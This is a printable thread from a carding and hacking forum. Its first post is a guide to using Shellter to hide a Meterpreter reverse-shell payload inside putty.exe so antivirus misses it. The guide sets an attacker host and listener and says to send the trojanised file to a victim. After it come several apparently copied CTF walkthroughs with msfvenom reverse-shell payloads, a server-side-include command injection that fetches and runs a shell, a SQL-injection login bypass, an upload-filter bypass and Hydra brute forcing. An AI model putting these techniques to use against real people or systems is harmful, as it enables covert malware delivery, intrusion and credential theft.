Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] How to Shellter-A Shellcode Injecting Tool - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Shellter-A Shellcode Injecting Tool (/Thread-Guide-How-to-Shellter-A-Shellcode-Injecting-Tool)

[Guide] How to Shellter-A Shellcode Injecting Tool - NINZA - 05-14-2020

Hey Folks! Welcome back to learning more of what you love to do. That is, evading security of other computer or network. You know that there are various tools to assist you in this. One of such tools is Shellter.
Shellter is an active shellcode insertion tool. It effectively re-encodes payloads (here shellcode) to bypass anti-virus (AV) software. Shellter has proved to be the first dynamic infector for PE (Portable Executable) file format of Windows 32-bit applications.
To use Shellter, you can either create your own shellcode or create one from a framework such as Metasploit. Shellter embeds a 32-bit Windows application and the shellcode in such a way that it goes undetected by the AV software.
Let’s now discuss the steps to evade an AV software using Shellter in Kali Linux.
Download and Install Shellter
Download Shellter from

[To see content please register here]

. You can download Shellter in Windows and then run it on Kali Linux using Wine. It runs Windows applications on Linux like operating systems. In this way, you can reduce the time required for installation.
You can install Shellter directly on Kali by using the following command:
apt-get install shellter
1
apt-get install shellter
[Image: 1.png?w=687&ssl=1]
You can install Wine on Kali with the following command:
apt-get install wine32
1
apt-get install wine32
[Image: 2.png?w=687&ssl=1]
Open Shellter
When you open Shellter in Kali in wine mode, it prompts you to choose operation mode.
[Image: 3.png?w=687&ssl=1]
Choose Operation Mode
Select the mode as ‘a’. It stands for auto.
Now, you need to choose an executable file and copy it to the Shellter folder. This is required to be done to bind Shellter with a .exe file. In our case, we have copied the putty.exe file to the Shellter folder and bound it with the shellter.exe file.
When asked for PE Target, type the following command:
/root/Downloads/putty.exe
1
/root/Downloads/putty.exe
[Image: 4.png?w=687&ssl=1]
The binding process starts.
[Image: 5.png?w=687&ssl=1]
Press the Enter key to continue. You may see DisASM.dll file gets successfully created. Enable Stealth Mode. Then, you are prompted to enable stealth mode.
Type ‘y’ for yes.
[Image: 6.png?w=687&ssl=1]
Select Payload
The screen shows a list of payloads. It asks you whether you want to use a listed payload or custom.
Type ‘L’ to use from the listed payload.
Then, it asks you to select payload by index. You can select payload of your choice. In our case, we have selected 1 for Meterpreter_Reverse_TCP
[Image: 7.png?w=687&ssl=1]
Then you are asked to set LHOST and LPORT. Type the local host IP and the local port on which you want the session. In our case, we have set LHOST 192.168.1.109 [Attacker IP] LPORT as 4444.
When you press the Enter key, the payload information is displayed.
[Image: 8.png?w=687&ssl=1]
A warning message appears and as soon as the injection is verified, you are asked to press the Enter key to continue. When you press the Enter key.
Run Exploit
In a new terminal type msfconsole to launch Metasploit framework and execute the following command
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <IP>
set lport <port-no.>
exploit
1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <IP>
set lport <port-no.>
exploit
[Image: 9.png?w=687&ssl=1]
Send PuTTY.exe File to Victim’s Machine
When the victim clicks the putty.exe file which will appear as similar to original putty.exe and hence the victim will get trapped and we will get a meterpreter session.
[Image: 10.png?w=687&ssl=1]
As soon as the victim clicks on the putty.exe file, we will get meterpreter session as shown in the below image.
The meterpreter session opens and there you are ready to peek into the target system.
[Image: 11.png?w=687&ssl=1]

Hello friends! Today we are going to take another CTF challenge known as ‘H.A.S.T.E.’. The credit for making this vm machine goes to “f1re_w1re” and it is a unique challenge as we just have to get a reverse shell just to complete the challenge. You can download this VM

[To see content please register here]

.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.102 but you will have to find your own)
netdiscover
[Image: 1.png?w=687&ssl=1]
Use nmap for port enumeration
nmap -sV 192.168.0.102
[Image: 2.png?w=687&ssl=1]
We find port 80 is open, so we open the ip address in our browser.
[Image: 3.png?w=687&ssl=1]
We don’t find anything on the page so we use dirb for listing directories on the web server.
dirb

[To see content please register here]


[Image: 4.png?w=687&ssl=1]
Now when we open

[To see content please register here]

we get a hint that the website maybe vulnerable to server side injection.
[Image: 5.png?w=687&ssl=1]
Now when we open

[To see content please register here]

we find the code executed by the server.
[Image: 6.png?w=687&ssl=1]
Now we go back to

[To see content please register here]

and use server side injection to execute our commands.
[Image: 7.1.png?w=687&ssl=1]
We executed ‘ls -al’ command to check if it is working, as u can see in the image below we successfully ran our command.
<!–##EXEC cmd=”ls -la” –>
[Image: 7.png?w=687&ssl=1]
Now we create a python payload using msfvenom.
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 > /root/Desktp/shell.py
[Image: 8.png?w=687&ssl=1]
Now we upload our shell to the server using server side injection.
<!–##EXEC cmd=”wget

[To see content please register here]

” –>
[Image: 9.png?w=687&ssl=1]
After successfully uploading the shell we use server side injection to execute our payload.
<!–##EXEC cmd=”python shell.py” –>
[Image: 10.png?w=687&ssl=1]
We setup our listener using metasploit.
msf > use exploit/multi/handler
msf exploit(handler)> set payload python/meterpreter/reverse_tcp
msf exploit(handler)> set lhost 192.168.0.107
msf exploit(handler)> set lport 4444
msf exploit(handler)> exploit
[Image: 11.png?w=687&ssl=1]
As soon as we execute our payload we get reverse shell. The main objective of the challenge was to get a reverse shell.
[Image: 12.png?w=687&ssl=1]

Today we are going to take another CTF challenge known as RickdiculouslyEasy by Luke. It is a very simple Rick and Morty themed boot to root. We have to get total of 130 points by collecting different flags (each flag has its points recorded with it), we also have to get root. If anyone is new to pentesting, it is worth a try!
You can download it from

[To see content please register here]


Security Level: Beginner
Penetration Methodology
Scanning
  • Discovering Targets IP
  • Network scanning (Nmap)
Enumeration
  • Surfing HTTP service port
  • Directory Enumeration
  • Connect to ftp
  • Command Injection
Exploiting
  • SSH login using Metasploit
  • Bruteforce login using Hydra
  • Using Netcat to get the reverse shell
Privilege Escalation
  • Checking SUID binaries
  • Accessing root directory
  • Capture the flag
Walkthrough
Scanning
After loading up the VM, our first step was to find out the target’s IP address.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]
We found our target’s IP address to be 192.168.1.101, next step was to scan the target’s IP with nmap.
nmap -p- -A 192.168.1.101
1
nmap -p- -A 192.168.1.101
The scan result showed open Ports; we found our first flag returned as a banner for the service running on port 13337, moreover, anonymous FTP login was allowed on port 21 holding another flag.txt file.
[Image: 2.png?w=687&ssl=1]
Enumeration
From the nmap scan, we knew that anonymous ftp login is available. So, we logged in with username as ‘anonymous’ and password as blank. While working on the ftp console, ls displayed that it had ‘FLAG.txt’ and a get command downloaded the FLAG.txt over FTP to the Kali box. We found our second flag inside FLAG.txt.
ftp 192.168.1.101
ls
get FLAG.txt
quit
cat flag.txt
1
2
3
4
5
ftp 192.168.1.101
ls
get FLAG.txt
quit
cat flag.txt
[Image: 3.png?w=687&ssl=1]
From nmap result we found HTTP service is also running on port 80. So, we browsed Target’s IP in the browser but in vain.
[Image: 4.png?w=687&ssl=1]
Next, we listed directories using dirb, it showed us two important directories ‘/passwords/’ and ‘/robots.txt’.
dirb

[To see content please register here]


1
dirb

[To see content please register here]


[Image: 5.png?w=687&ssl=1]
Viewing ‘/passwords/’ directory displayed ‘FLAG.txt’ and ‘password.html’.
[Image: 6.png?w=687&ssl=1]
We found our third flag here, so far it was a cake walk.
[Image: 7.png?w=687&ssl=1]
Browsing ‘/passwords/password.html’ pointed of the hidden password.
[Image: 8.png?w=687&ssl=1]
Why not go for source code! And the instinct was right we have a password here “winter” which we can use somewhere later.
[Image: 9.png?w=687&ssl=1]
Next, we opened ‘/robots.txt’ and found link to two files ‘/cgi-bin/root_shell.cgi’ and ‘/cgi-bin/ tracertool.cgi’.
[Image: 10.png?w=687&ssl=1]
Only ‘/cgi-bin/tracertool.cgi’ is found to be useful, browsing this I found that one could get away with command injection or say RCE.
[Image: 11.png?w=687&ssl=1]
I also found that few commands have been filtered so we had to use ‘more’ instead of ‘cat’ to get the name of the users in /etc/passwd file. Here I found three users as RickSanchez, Morty and Summer. Summer could be linked to ‘winter’ that we had found earlier.
[Image: 12.png?w=687&ssl=1]
Exploiting
It was time to perform ssh login using Metasploit with port 22222 using newly acquired credentials. And we found one more flag here.
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.101
set rport 22222
set username Summer
set password winter
exploit
sessions -u 1
sessions 2
ls
cat FLAG.txt
1
2
3
4
5
6
7
8
9
10
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.101
set rport 22222
set username Summer
set password winter
exploit
sessions -u 1
sessions 2
ls
cat FLAG.txt
[Image: 13.png?w=687&ssl=1]
Further enumeration showed three directories with the same name as of users that we found earlier. From directory Morty, we downloaded two files ‘Safe_Password.jpg’ and ‘Journal.txt.zip’.
cd /home
ls
cd Morty
ls
download Safe_password.jpg .
download journal.txt.zip .
1
2
3
4
5
6
cd /home
ls
cd Morty
ls
download Safe_password.jpg .
download journal.txt.zip .
[Image: 14.png?w=687&ssl=1]
Safe_Password.jpg was an image file, but running strings on the file shows that a password “Meeseek” is contained inside it.
strings Safe_Password.jpg
1
strings Safe_Password.jpg
[Image: 15.png?w=687&ssl=1]
Unzipping the file and supplying the password ‘Meeseek’ opened the file journal.txt. And you can see the next flag inside it.
unzip journal.txt.zip
cat journal.txt
1
2
unzip journal.txt.zip
cat journal.txt
Along with flag a number string ‘131333’was there too and the message in the file hints it to be some kind of password.
[Image: 16.png?w=687&ssl=1]
Back at the target VM, inside ‘RickSanchez’ directory there is a subdirectory named “RICK_SAFE” which was mentioned in the previous screenshot. Inside this, there is an executable file named “safe”. I downloaded this file into the main machine kali.
cd RickSanchez
ls
cd RICK_SAFE
ls
download safe .
1
2
3
4
5
cd RickSanchez
ls
cd RICK_SAFE
ls
download safe .
[Image: 17.png?w=687&ssl=1]
After providing all permissions to the file ‘safe’ when executed by providing the string given with the previous flag, it displayed our fifth flag. Inside it there are clues for Ricks’s password too.
chmod 777 safe
./safe
./safe 131333
1
2
3
chmod 777 safe
./safe
./safe 131333
[Image: 18.png?w=687&ssl=1]
As the next password contains 1 uppercase character, 1 digit followed by one of the words in the name of the old band of Rick Sanchez. So, I had to do some web surfing to find out the band’s name, it was called ‘the flesh curtains ‘. Next, we used crunch to create two different format dictionaries and saved both of them in dict.txt.
crunch 10 10 -t ,%Curtains -O >> dict.txt
crunch 7 7 -t ,%Flesh -O >> dict.txt
1
2
crunch 10 10 -t ,%Curtains -O >> dict.txt
crunch 7 7 -t ,%Flesh -O >> dict.txt
[Image: 19.png?w=687&ssl=1]
It was time to use Hydra which tried to login the service using every possible combination of users and passwords provided in the dict.txt.
hydra -l RickSanchez -P dict.txt 192.168.1.101 ssh  -s  22222
1
hydra -l RickSanchez -P dict.txt 192.168.1.101 ssh  -s  22222
Great! we found a user/password pair.
[Image: 20.png?w=687&ssl=1]
Privilege Escalation
Then I logged into ssh using recently acquired credentials. I reminded myself of the message in the last flag that “sudo is wheely good” so I ran sudo -l to find out his permissions. He had sudo permissions for ALL commands, so I just popped into an interactive root shell. In the root directory, we had our next flag inside FLAG.txt. But in order to get the flag, we had to use ‘more’ instead of ‘cat’.
ssh [email protected] -p 22222
sudo -l
sudo su
cd/root
ls
cat FLAG.txt
more FLAG.txt
1
2
3
4
5
6
7
ssh [email protected] -p 22222
sudo -l
sudo su
cd/root
ls
cat FLAG.txt
more FLAG.txt
[Image: 21.png?w=687&ssl=1]
Now I was a root and  I had 110 points out of 130.Where did I miss 20 points? We still didn’t check out few open ports.
We exploited port 60000 using netcat and it took us to a shell. ls showed us FLAG.txt and a cat displayed the flag.
nc 192.168.1.101 60000
ls
cat FLAG.txt
1
2
3
nc 192.168.1.101 60000
ls
cat FLAG.txt
[Image: 22.png?w=687&ssl=1]
We opened port 9090 in a web browser and found the last flag. Hence the task is completed.
[Image: 23.png?w=687&ssl=1]

BTRSys v1 is another lab by ‘ismailonderkaya’ in the series BTRSys. This lab helps you sharpen your skills as a pentester. It is a must lab for a beginner.
Difficulty level: Beginner
WalkThrough
Let’s start with finding our target as always by using the following command:
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]
Now as we know our target is 192.168.0.105. Let’s use nmap on it. We all know nmap has many types of scans but aggression scan is much better as it combines and gives all the information at once.
nmap -A 192.168.0.105
1
nmap -A 192.168.0.105
[Image: 2.png?w=687&ssl=1]
Through nmap, we know that port 21, 22 and 80 are open with the services of FTP, SSH, and HTTP respectively. As nmap hasn’t told us much; we shall dig deeper by using Nikto. Nikto is an open-source web server scanner which allows you look for vulnerable files/programs, outdated versions, index files, http server options, etc. to use Nikto type :
nikto -h

[To see content please register here]


1
nikto -h

[To see content please register here]


[Image: 3.png?w=687&ssl=1]
With the help of Nikto, we know that there is login page à /login.php
Let’s go the login page by typing the following in URL:
192.168.0.105/login.php
1
192.168.0.105/login.php
[Image: 4.png?w=687&ssl=1]
So now we in on login page but we do not have credentials to log in. Let’s check its page source.
[Image: 5.png?w=687&ssl=1]
Now in the page source if you observe the function control carefully, you’ll realize that username ends with @btrisk.com so, therefore we can use SQL injection here and for that use the following steps:
Use brute force to apply SQL injection. (When asked for text file for brute-force, select the one with the list of all SQL injection commands)
[Image: 6.png?w=687&ssl=1]
After the completion of brute force, it will give the correct SQL code which will help you log in as shown in the above image.
[Image: 7.1.png?w=687&ssl=1]

Right click on that code and select ‘Show response in browser’ as shown above. This will open the browser and you will find yourself automatically logged in.
Login Details: @btrisk.com  ‘ or “=’
[Image: 7.png?w=687&ssl=1]
As we are logged in, there is an option to upload a file. Here, we can upload our malicious PHP code. To generate the code go to the terminal of kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw
[Image: 8.png?w=687&ssl=1]
Copy the code from <?php to die(); and save it in .txt file. After saving change the extension from .txt to .php and then upload it.
[Image: 9.png?w=687&ssl=1]
When you try to upload your .php file it will show that only jpg and png files can be uploaded. Okay! So now change the extension from .php to .jpg and then upload it but when you upload it remember to capture the request in burp suite.
[Image: 10.png?w=687&ssl=1]
Once the request is captured in BurpSuite, change the file extension from .jpg back to .php and forward the request. This way your malicious .php code will be uploaded on the web application.
[Image: 11.png?w=687&ssl=1]
Our malicious file I s uploaded but we yet have to find the directory where it was uploaded so we can execute it and have our session. Therefore, next, we will use DIRB. And for that type:
dirb

[To see content please register here]


1
dirb

[To see content please register here]


[Image: 12.1.png?w=687&ssl=1]
Dirb has shown us that there is a directory named uploads so obviously there our file has been uploaded. To execute the file type the following in the URL:
192.168.0.105/uploadsd/shell.php
1
192.168.0.105/uploadsd/shell.php
[Image: 12.png?w=687&ssl=1]
Like always before executing the file remember to activate your handler on Metasploit so that you can have your session. And for this open Metasploit and type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.107
set lport 4444
exploit
1
2
3
4
5
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.107
set lport 4444
exploit
After the handler is activated and your file is executed; you will have your meterpreter session. Let’s then further check system information and for that type:
sysinfo
1
sysinfo
[Image: 13.png?w=687&ssl=1]
Now that we have meterpreter session let’s explore a bit and look into HTML files:
cd /var/www/html
ls
1
2
cd /var/www/html
ls
There is a config.php file in var/www/html. This file has often proven to be important so let’s check it out.
cat config.php
1
cat config.php
[Image: 14.png?w=687&ssl=1]
Through config.php we know that one of the following words is a username and password :
root
toor
deneme
1
2
3
root
toor
deneme
Let’s now go to shell and try to log in through these three keywords :
shell
mysql -uroot -p -Ddeneme
1
2
shell
mysql -uroot -p -Ddeneme
And then enter password toor
Once logged in let’s look for tables by using the following command :
show tables;
1
show tables;
[Image: 15.png?w=687&ssl=1]
As shown in the above image there is a table named user. Let’s see what this table has :
select * from user;
1
select * from user;
[Image: 16.png?w=687&ssl=1]
From the table, we now know that the password for root is asd123***. Let’s login from it :
su root
asd123***
1
2
su root
asd123***
Let’s confirm our root access :
whoami
1
whoami
[Image: 17.png?w=687&ssl=1]